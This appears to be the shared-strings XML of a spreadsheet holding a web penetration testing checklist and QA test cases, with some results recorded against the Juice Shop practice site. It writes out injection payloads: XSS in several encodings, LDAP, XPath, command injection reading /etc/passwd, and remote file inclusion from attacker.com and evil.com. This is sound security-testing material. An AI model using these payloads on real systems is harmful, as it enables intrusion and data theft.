    <t>Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Xenotix XSS</t>
  </si>
  <si>
    <t>OTG-INPVAL-002</t>
  </si>
  <si>
    <t>Testing for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, BeEF, XSS Proxy</t>
  </si>
  <si>
    <t>OTG-INPVAL-003</t>
  </si>
  <si>
    <t>Testing for HTTP Verb Tampering</t>
  </si>
  <si>
    <t>Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.</t>
  </si>
  <si>
    <t>netcat</t>
  </si>
  <si>
    <t>OTG-INPVAL-004</t>
  </si>
  <si>
    <t>Testing for HTTP Parameter pollution</t>
  </si>
  <si>
    <t>Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP</t>
  </si>
  <si>
    <t>ZAP, HPP Finder (Chrome Plugin)</t>
  </si>
  <si>
    <t>OTG-INPVAL-005</t>
  </si>
  <si>
    <t>Testing for SQL Injection</t>
  </si>
  <si>
    <t>Union, Boolean, Error based, Out-of-band, Time delay.</t>
  </si>
  <si>
    <t>Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)</t>
  </si>
  <si>
    <t>Oracle Testing</t>
  </si>
  <si>
    <t>Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection</t>
  </si>
  <si>
    <t>Orascan, SQLInjector</t>
  </si>
  <si>
    <t>MySQL Testing</t>
  </si>
  <si>
    <t>Identify MySQL version, Single quote, Information_schema, Read/Write file.</t>
  </si>
  <si>
    <t>SQLMap, Mysqloit, Power Injector</t>
  </si>
  <si>
    <t>SQL Server Testing</t>
  </si>
  <si>
    <t>Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)</t>
  </si>
  <si>
    <t>SQLMap, SQLninja, Power Injector</t>
  </si>
  <si>
    <t>Testing PostgreSQL</t>
  </si>
  <si>
    <t>Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)</t>
  </si>
  <si>
    <t>SQLMap</t>
  </si>
  <si>
    <t>MS Access Testing</t>
  </si>
  <si>
    <t>Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.</t>
  </si>
  <si>
    <t>Testing for NoSQL injection</t>
  </si>
  <si>
    <t>Identify NoSQL databases, Pass special characters (' " \ ; { } ), Attack with reserved variable name, operator.</t>
  </si>
  <si>
    <t>NoSQLMap</t>
  </si>
  <si>
    <t>OTG-INPVAL-006</t>
  </si>
  <si>
    <t>Testing for LDAP Injection</t>
  </si>
  <si>
    <t>/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password</t>
  </si>
  <si>
    <t>OTG-INPVAL-007</t>
  </si>
  <si>
    <t>Testing for ORM Injection</t>
  </si>
  <si>
    <t>Testing ORM injection is identical to SQL injection testing</t>
  </si>
  <si>
    <t>Hibernate, Nhibernate</t>
  </si>
  <si>
    <t>OTG-INPVAL-008</t>
  </si>
  <si>
    <t>Testing for XML Injection</t>
  </si>
  <si>
    <t>Check with XML Meta Characters
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG</t>
  </si>
  <si>
    <t>OTG-INPVAL-009</t>
  </si>
  <si>
    <t>Testing for SSI Injection</t>
  </si>
  <si>
    <t>• Presense of .shtml extension
• Check for these characters
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
• include String = &lt;!--#include virtual="/etc/passwd" --&gt;</t>
  </si>
  <si>
    <t>OTG-INPVAL-010</t>
  </si>
  <si>
    <t>Testing for XPath Injection</t>
  </si>
  <si>
    <t>Check for XML error enumeration by supplying a single quote (')
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>OTG-INPVAL-011</t>
  </si>
  <si>
    <t>IMAP/SMTP Injection</t>
  </si>
  <si>
    <t>• Identifying vulnerable parameters with special characters
(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the client
• IMAP/SMTP command injection (Header, Body, Footer)</t>
  </si>
  <si>
    <t>OTG-INPVAL-012</t>
  </si>
  <si>
    <t>Testing for Code Injection</t>
  </si>
  <si>
    <t>Enter OS commands in the input field.
?arg=1; system('id')</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Liffy, Panoptic</t>
  </si>
  <si>
    <t>Testing for Local File Inclusion</t>
  </si>
  <si>
    <t>LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)</t>
  </si>
  <si>
    <t>Burp Proxy, fimap, Liffy</t>
  </si>
  <si>
    <t>Testing for Remote File Inclusion</t>
  </si>
  <si>
    <t>RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t>OTG-INPVAL-013</t>
  </si>
  <si>
    <t>Testing for Command Injection</t>
  </si>
  <si>
    <t>Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Commix</t>
  </si>
  <si>
    <t>OTG-INPVAL-014</t>
  </si>
  <si>
    <t>Testing for Buffer overflow</t>
  </si>
  <si>
    <t>• Testing for heap overflow vulnerability
• Testing for stack overflow vulnerability
• Testing for format string vulnerability</t>
  </si>
  <si>
    <t>Immunity Canvas, Spike, MSF, Nessus</t>
  </si>
  <si>
    <t>Testing for Heap overflow</t>
  </si>
  <si>
    <t>Testing for Stack overflow</t>
  </si>
  <si>
    <t>Testing for Format string</t>
  </si>
  <si>
    <t>OTG-INPVAL-015</t>
  </si>
  <si>
    <t>Testing for incubated vulnerabilities</t>
  </si>
  <si>
    <t>File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)</t>
  </si>
  <si>
    <t>Burp Proxy, BeEF, MSF</t>
  </si>
  <si>
    <t>OTG-INPVAL-016</t>
  </si>
  <si>
    <t>Testing for HTTP Splitting/Smuggling</t>
  </si>
  <si>
    <t>param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a&lt;html&gt;Sorry,%20System%20Down&lt;/html&gt;</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, netcat</t>
  </si>
  <si>
    <t>OTG-ERR-001</t>
  </si>
  <si>
    <t>Analysis of Error Codes</t>
  </si>
  <si>
    <t>Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)</t>
  </si>
  <si>
    <t>OTG-ERR-002</t>
  </si>
  <si>
    <t>Analysis of Stack Traces</t>
  </si>
  <si>
    <t>• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syn
tax
• Access to internal pages without authentication
• Bypassing application flow</t>
  </si>
  <si>
    <t>OTG-CRYPST-001</t>
  </si>
  <si>
    <t>Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection</t>
  </si>
  <si>
    <t>Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)</t>
  </si>
  <si>
    <t>testssl.sh, SSL Breacher</t>
  </si>
  <si>
    <t>OTG-CRYPST-002</t>
  </si>
  <si>
    <t>Testing for Padding Oracle</t>
  </si>
  <si>
    <t>Compare the responses in three different states:
• Cipher text gets decrypted, resulting data is correct.
• Cipher text gets decrypted, resulting data is garbled and causes
some exception or error handling in the application logic.
• Cipher text decryption fails due to padding errors.</t>
  </si>
  <si>
    <t>PadBuster, Poracle, python-paddingoracle, POET</t>
  </si>
  <si>
    <t>OTG-CRYPST-003</t>
  </si>
  <si>
    <t>Testing for Sensitive information sent via unencrypted channels</t>
  </si>
  <si>
    <t>Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Curl</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-001</t>
  </si>
  <si>
    <t>Test Business Logic Data Validation</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for data entry points or hand off points between systems or software.
• Once found try to insert logically invalid data into the application/system. </t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-002</t>
  </si>
  <si>
    <t>Test Ability to Forge Requests</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for guessable, predictable or hidden functionality of fields.
• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow. </t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-003</t>
  </si>
  <si>
    <t>Test Integrity Checks</t>
  </si>
  <si>
    <t xml:space="preserve">•Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.
• For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.
• Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow. </t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-004</t>
  </si>
  <si>
    <t>Test for Process Timing</t>
  </si>
  <si>
    <t>• Looking for application/system functionality that may
be impacted by time. Such as execution time or actions that
help users predict a future outcome or allow one to circumvent
any part of the business logic or workflow. For example, not
completing transactions in an expected time.
• Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing.</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-005</t>
  </si>
  <si>
    <t>Test Number of Times a Function Can be Used Limits</t>
  </si>
  <si>
    <t>• Looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow.
• For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-006</t>
  </si>
  <si>
    <t>Testing for the Circumvention of Work Flows</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.
• For each method develop a misuse case and try to circumvent or perform an action that is "not acceptable" per the the business logic workflow. </t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-007</t>
  </si>
  <si>
    <t>Test Defenses Against Application Mis-use</t>
  </si>
  <si>
    <t>Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-008</t>
  </si>
  <si>
    <t>Test Upload of Unexpected File Types</t>
  </si>
  <si>
    <t>• Review the project documentation and perform some exploratory testing looking for file types that should be "unsupported" by the application/system.
• Try to upload these “unsupported” files an verify that it are properly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. 
PS. file.phtml, shell.phPWND, SHELL~1.PHP</t>
  </si>
  <si>
    <t>OTG-BUSLOGIC-009</t>
  </si>
  <si>
    <t>Test Upload of Malicious Files</t>
  </si>
  <si>
    <t xml:space="preserve">• Develop or acquire a known “malicious” file.
• Try to upload the malicious file to the application/system and verify that it is correctly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. </t>
  </si>
  <si>
    <t>OTG-CLIENT-001</t>
  </si>
  <si>
    <t>Testing for DOM based Cross Site Scripting</t>
  </si>
  <si>
    <t>Test for the user inputs obtained from client-side JavaScript Objects</t>
  </si>
  <si>
    <t>Burp Proxy, DOMinator</t>
  </si>
  <si>
    <t>OTG-CLIENT-002</t>
  </si>
  <si>
    <t>Testing for JavaScript Execution</t>
  </si>
  <si>
    <t>Inject JavaScript code:
www.victim.com/?javascript:alert(1)</t>
  </si>
  <si>
    <t>OTG-CLIENT-003</t>
  </si>
  <si>
    <t>Testing for HTML Injection</t>
  </si>
  <si>
    <t>Send malicious HTML code:
?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>OTG-CLIENT-004</t>
  </si>
  <si>
    <t>Testing for Client Side URL Redirect</t>
  </si>
  <si>
    <t xml:space="preserve">Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t>OTG-CLIENT-005</t>
  </si>
  <si>
    <t>Testing for CSS Injection</t>
  </si>
  <si>
    <t>Inject code in the CSS context :
•  www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)</t>
  </si>
  <si>
    <t>OTG-CLIENT-006</t>
  </si>
  <si>
    <t>Testing for Client Side Resource Manipulation</t>
  </si>
  <si>
    <t>External JavaScript could be easily injected in the trusted web site
www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t>OTG-CLIENT-007</t>
  </si>
  <si>
    <t>Test Cross Origin Resource Sharing</t>
  </si>
  <si>
    <t>Check the HTTP headers in order to understand how CORS is
used (Origin Header)</t>
  </si>
  <si>
    <t>OTG-CLIENT-008</t>
  </si>
  <si>
    <t>Testing for Cross Site Flashing</t>
  </si>
  <si>
    <t>Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil</t>
  </si>
  <si>
    <t>FlashBang, Flare, Flasm, SWFScan, SWF Intruder</t>
  </si>
  <si>
    <t>OTG-CLIENT-009</t>
  </si>
  <si>
    <t>Testing for Clickjacking</t>
  </si>
  <si>
    <t>Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.</t>
  </si>
  <si>
    <t>Burp Proxy, ClickjackingTool</t>
  </si>
  <si>
    <t>OTG-CLIENT-010</t>
  </si>
  <si>
    <t>Testing WebSockets</t>
  </si>
  <si>
    <t>Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.Use Google Chrome's Developer Tools to view the Network WebSocket communication. Check Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization</t>
  </si>
  <si>
    <t>Burp Proxy, Chrome, ZAP, WebSocket Client</t>
  </si>
  <si>
    <t>OTG-CLIENT-011</t>
  </si>
  <si>
    <t>Test Web Messaging</t>
  </si>
  <si>
    <t>Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains</t>
  </si>
  <si>
    <t>OTG-CLIENT-012</t>
  </si>
  <si>
    <t>Test Local Storage</t>
  </si>
  <si>
    <t>Determine whether the website is storing sensitive data in the storage. XSS in localstorage 
http://server/StoragePOC.html#&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>Chrome, Firebug, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>Pass</t>
  </si>
  <si>
    <t>Issues</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>Sl. No.</t>
  </si>
  <si>
    <t>Burp Suite</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Source: http://portswigger.net/burp/
License: Profesional </t>
  </si>
  <si>
    <t>theharvester</t>
  </si>
  <si>
    <t>The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.
This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.
License: Free Software, Open Source</t>
  </si>
  <si>
    <t>Hostile Subbrute Forcer</t>
  </si>
  <si>
    <t>This app will bruteforce for exisiting subdomains and provide the following information:
IP address
Host
if the 3rd party host has been properly setup. (for example if site.example.com is poiting to a nonexisiting Heroku subdomain, it'll alert you) -&gt; Currently only works with AWS, Github, Heroku, shopify, tumblr and squarespace.
There may be some false positives depending on the host configurations. (Tried to take them out as much as possible) Also works recursively at the end to get the subdomains under the ones that it has already found and dumps all your data into an output.txt file just in case (fresh one gets created at the beginning of each process)</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_01</t>
  </si>
  <si>
    <t>Test Case Name</t>
  </si>
  <si>
    <t>Test Case Description</t>
  </si>
  <si>
    <t>Test Step Description</t>
  </si>
  <si>
    <t>Expected Result</t>
  </si>
  <si>
    <t>Actual Result</t>
  </si>
  <si>
    <t>Feedback</t>
  </si>
  <si>
    <t>STATUS</t>
  </si>
  <si>
    <t>Defect</t>
  </si>
  <si>
    <t>Comments</t>
  </si>
  <si>
    <t>Cross Site scripting ( XSS) on input parameters</t>
  </si>
  <si>
    <t>Verify if entered data in the input field is reflected on the application page.</t>
  </si>
  <si>
    <t>1.Open the browser and go to the web site
2.Check all the links in the website which has some fields to input some data like "search","first name","lastname" etc</t>
  </si>
  <si>
    <t>PASS</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>Enter data "</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Hello"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> in all the input fields on the page.Verify if "Hello" is reflected in the webpage or at the HTML level by right-clicking on the page and viewing the page source</t>
    </r>
  </si>
  <si>
    <t>(i). If  "Hello" is reflected on the web page (apart from the input field) then enter
 &lt;script&gt;alert(1)&lt;/script&gt; payload in the same field. Verify if you get an alert pop up.
(ii). If "Hello" is not reflected in UI directly, go to the page source by right click(mouse) on the web page and 
select view page source. Check for "Hello" using ctrl+f on page source. You will encounter following
scenarios:-
1. If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'&gt; 
then create a payload by closing the tag with single quotes and closing like '&gt; on the input parameter on web
page and put xss payload which will now be '&gt;&lt;script&gt;alert(1)&lt;/script&gt;
2.If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'"&gt; 
then create a payload by closing the tag with double quotes and closing like '&gt; on the input parameter on web page and put xss payload which will now be "'&gt;&lt;script&gt;alert(1)&lt;/script&gt;
3.If "Hello" is closed in a tag like &lt;input type="text" name="name" value=hello&gt; 
then create a payload by closing the tag like &gt; on the input parameter on web
page and put xss payload which will now be &gt;&lt;script&gt;alert(1)&lt;/script&gt;
4.If "Hello" is not enclosed in any tags like &lt;center&gt;&lt;script&gt;var search_str="hello";&lt;/script&gt; then we can close the immediate tag(which is script tag) put our xss payload like &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Alert pop up should not be displayed on the web page but if it does, xss is confirmed.</t>
  </si>
  <si>
    <t>Test case is woking as per given steps.</t>
  </si>
  <si>
    <t>Cross Site scripting ( XSS) on URL parameters</t>
  </si>
  <si>
    <t>Verify if entered data in the URL is reflected on the web page.</t>
  </si>
  <si>
    <t>1.Open the browser and go to the web site
2.Check all the links in the website which has some fields on URL to input some data like "search",first name,lastname etc</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>Check if there is any parameter in the URL, if yes then Enter data "</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Hello"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> as parameter in the URL and load the URL. Check in the webpage or at the HTML level by right-clicking on the page and viewing the page source to verify if the text enetered is reflected</t>
    </r>
  </si>
  <si>
    <t>(i). If  "Hello" is reflected on the web page (apart from the URL parameter),  then enter &lt;script&gt;alert(1)&lt;/script&gt; payload in the same field. Verify if you get an alert pop up.
(ii). If "Hello" is not reflected, go to the page source by right click(mouse) on the web page and 
select view page source. Check for "Hello" using ctrl+f on page source. You will encounter following
scenarios:-
1. If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'&gt; 
then create a payload by closing the tag with single quotes and closing like '&gt; on the input parameter on web
page and put xss payload which will now be '&gt;&lt;script&gt;alert(1)&lt;/script&gt;
2.If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'"&gt; 
then create a payload by closing the tag with double quotes and closing like '&gt; on the input parameter on web page and put xss payload which will now be "'&gt;&lt;script&gt;alert(1)&lt;/script&gt;
3.If "Hello" is closed in a tag like &lt;input type="text" name="name" value=hello&gt; 
then create a payload by closing the tag like &gt; on the input parameter on web
page and put xss payload which will now be &gt;&lt;script&gt;alert(1)&lt;/script&gt;
4.If "Hello" is not enclosed in any tags like &lt;center&gt;&lt;script&gt;var search_str="hello";&lt;/script&gt; then we can close the immediate tag(which is script tag) put our xss payload like &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Cross Site scripting ( XSS) on URL by adding encoding</t>
  </si>
  <si>
    <t>(i). If  "Hello" is reflected on the web page (apart from the input field) then enter
%3Cscript%3Ealert()%3C/script%3E    (This would basically represent &lt;script&gt;alert(1)&lt;/script&gt;).
Check if you get a pop-up. 
 1. If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'&gt; 
then create a payload by closing the tag with single quotes and closing like '&gt; on the input parameter on web
page and put xss payload which will now be %27%3E%3Cscript%3Ealert()%3C/script%3E  (This represents '&gt;&lt;script&gt;alert(1)&lt;/script&gt;)
2.If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'"&gt; 
then create a payload by closing the tag with double quotes and closing like '&gt; on the input parameter on web page and put xss payload which will now be %22%27%3E%3Cscript%3Ealert()%3C/script%3E (This represents "'&gt;&lt;script&gt;alert(1)&lt;/script&gt;)
3.If "Hello" is closed in a tag like &lt;input type="text" name="name" value=hello&gt; 
then create a payload by closing the tag like &gt; on the input parameter on web
page and put xss payload which will now be  %3E%3Cscript%3Ealert()%3C/script%3E (This represents &gt;&lt;script&gt;alert(1)&lt;/script&gt;)
4.If "Hello" is not enclosed in any tags like &lt;center&gt;&lt;script&gt;var search_str="hello";&lt;/script&gt; then we can close the immediate tag(which is script tag) put our xss payload like  %3C/script%3E%3Cscript%3Ealert()%3C/script%3E (This represents &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;)</t>
  </si>
  <si>
    <t>Cross Site scripting ( XSS) using svg payload</t>
  </si>
  <si>
    <t>Verify if the application URL is vulnerable for SVG payload</t>
  </si>
  <si>
    <t xml:space="preserve">(i). If  "Hello" is reflected on the web page (apart from the input field) then enter
 &lt;script&gt;alert(1)&lt;/script&gt; payload in the same field. Verify if you get an alert pop up.
(ii). If "Hello" is not reflected in UI directly, go to the page source by right click(mouse) on the web page and 
(iii) If the script tags are getting filtered, then try SVG payload like &lt;svg/onload=alert('XSS')&gt;. You can try this based on how your input is handled (Ex: You can try with &gt;&lt;svg/onload=alert('XSS')&gt; or "&gt;&lt;svg/onload=alert('XSS')&gt; or '&gt;&lt;svg/onload=alert('XSS')&gt; or "&lt;svg/onload=alert('XSS')&gt; or '&lt;svg/onload=alert('XSS')&gt;) </t>
  </si>
  <si>
    <t>Cross Site scripting ( XSS) using double encoding</t>
  </si>
  <si>
    <t>Verify if the application URL is vulnerable for double encoding</t>
  </si>
  <si>
    <t>(i). If  "Hello" is reflected on the web page (apart from the input field) then enter
 &lt;script&gt;alert(1)&lt;/script&gt; payload in the same field. Verify if you get an alert pop up.</t>
  </si>
  <si>
    <t>If the tags like &lt;, &gt; , / are getting filtered by the application, the use below double encoding technique. For &lt;script&gt;alert('XSS')&lt;/script&gt;, the double encoding value would be %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
The details are given below on the hexadecimal encode value. Ex: Encode value for &lt; is %3C and we need to encode % again and % encode value is %25, hence for &lt; the encode value will be %253C. Similarly try for other payload like and check if the application is vulnrable for double encoding XSS
&gt;&lt;script&gt;alert(1)&lt;/script&gt;
"'&gt;&lt;script&gt;alert(1)&lt;/script&gt;
'&gt;&lt;script&gt;alert(1)&lt;/script&gt;
"&lt;script&gt;alert(1)&lt;/script&gt;
'&lt;script&gt;alert(1)&lt;/script&gt;
CharHex encodeThen encoding '%'Double encode
“&lt;”“%3C”“%25”“%253C”
“/”“%2F”“%25”“%252F”
“&gt;”“%3E”“%25”“%253E”</t>
  </si>
  <si>
    <t>able to understand the test case properly</t>
  </si>
  <si>
    <t>Navigate to the URL"https://juice-shop.herokuapp.com/" , and searched "hello" keyword by entering it in search field,and when inspected the page source able to find the "hello" word only as searched content.</t>
  </si>
  <si>
    <t>QT_PEN_TIER_1_02</t>
  </si>
  <si>
    <t>HTML Injection on input parameters</t>
  </si>
  <si>
    <t>Verify if entered HTML code in the input field is reflected on the Web page.</t>
  </si>
  <si>
    <t>1.Open the browser and go to the web site
2.Check all the links in the website which has some fields to input some data like "search",first name,lastname etc</t>
  </si>
  <si>
    <t xml:space="preserve">If  "Hello" is reflected on the web page (apart from the input field) , then enter &lt;h1&gt;You have been hacked&lt;/h1&gt; payload in the same field and load the URL. 
Verify if font of Hello is changed as per h1 tag. If Yes, then enter &lt;a HREF="http://bing.com/"&gt;Click here for offers&lt;/a&gt;
in the same input field and load the page.
Check if you get the link with the name "Click here for offers". You can try creating HREF link based on how the text entered is handled. Create the payload as mentioned below and once the text entered is chanhed as per h1 tage, then try the HREF link or you can even try XSS here
1. If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'&gt; 
then create a payload by closing the tag with single quotes and closing like '&gt; on the input parameter on web
page and put xss payload which will now be '&gt;&lt;h1&gt;You have been hacked&lt;/h1&gt;
2.If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'"&gt; 
then create a payload by closing the tag with double quotes and closing like '&gt; on the input parameter on web page and put xss payload which will now be "'&gt;&lt;h1&gt;You have been hacked&lt;/h1&gt;
3.If "Hello" is closed in a tag like &lt;input type="text" name="name" value=hello&gt; 
then create a payload by closing the tag like &gt; on the input parameter on web
page and put xss payload which will now be &gt;&lt;h1&gt;You have been hacked&lt;/h1&gt;
4.If "Hello" is not enclosed in any tags like &lt;center&gt;&lt;script&gt;var search_str="hello";&lt;/script&gt; then we can close the immediate tag(which is script tag) put our xss payload like &lt;/script&gt;&lt;h1&gt;You have been hacked&lt;/h1&gt;
Repeat the same for &lt;a HREF="http://bing.com/"&gt;Click here for offers&lt;/a&gt;
</t>
  </si>
  <si>
    <t>Paloads should not get executed also the font size should not change</t>
  </si>
  <si>
    <t>able to exicute test case properly</t>
  </si>
  <si>
    <t>Navigate to the URL"https://juice-shop.herokuapp.com/" , and searched "hello" keyword by entering it in search field,and when inspected the page source size of "hello" did not changed.</t>
  </si>
  <si>
    <t>HTML Injection on URL parameters</t>
  </si>
  <si>
    <t>Verify if entered HTML code in the URL is reflected on the web page.</t>
  </si>
  <si>
    <t>1.Open the browser and go to the web site
2.Check all the links in the website which has some fields on URL to input some data like "search","first name", "lastname" etc</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t>Check if there is any parameter in the URL, if yes then Enter data "</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <charset val="1"/>
        <scheme val="minor"/>
      </rPr>
      <t>Hello"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> as parameter in the URL.Verify if Hello 
is being reflected</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Check If  "Hello" is reflected on the web page then enter &lt;h1&gt;You have been hacked&lt;/h1&gt; payload in the same parameter field
Verify if font of Hello is changed as per h1 tag. If Yes, then enter &lt;a HREF="http://bing.com/"&gt;Click here for offers&lt;/a&gt;
in the same input field and load the page.
Check if you get the link with the name "Click here for offers". You can try creating HREF link based on how the text entered is handled. Create the payload as mentioned below and once the text entered is chanhed as per h1 tage, then try the HREF link or you can even try XSS here
1. If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'&gt; 
then create a payload by closing the tag with single quotes and closing like '&gt; on the input parameter on web
page and put xss payload which will now be '&gt;&lt;h1&gt;You have been hacked&lt;/h1&gt;
2.If "Hello" is closed in a tag like &lt;input type="text" name="name" value='hello'"&gt; 
then create a payload by closing the tag with double quotes and closing like '&gt; on the input parameter on web page and put xss payload which will now be "'&gt;&lt;h1&gt;You have been hacked&lt;/h1&gt;
3.If "Hello" is closed in a tag like &lt;input type="text" name="name" value=hello&gt; 
then create a payload by closing the tag like &gt; on the input parameter on web
page and put xss payload which will now be &gt;&lt;h1&gt;You have been hacked&lt;/h1&gt;
4.If "Hello" is not enclosed in any tags like &lt;center&gt;&lt;script&gt;var search_str="hello";&lt;/script&gt; then we can close the immediate tag(which is script tag) put our xss payload like &lt;/script&gt;&lt;h1&gt;You have been hacked&lt;/h1&gt;
</t>
  </si>
  <si>
    <t>Payloads should not get executed also the font size should not change</t>
  </si>
  <si>
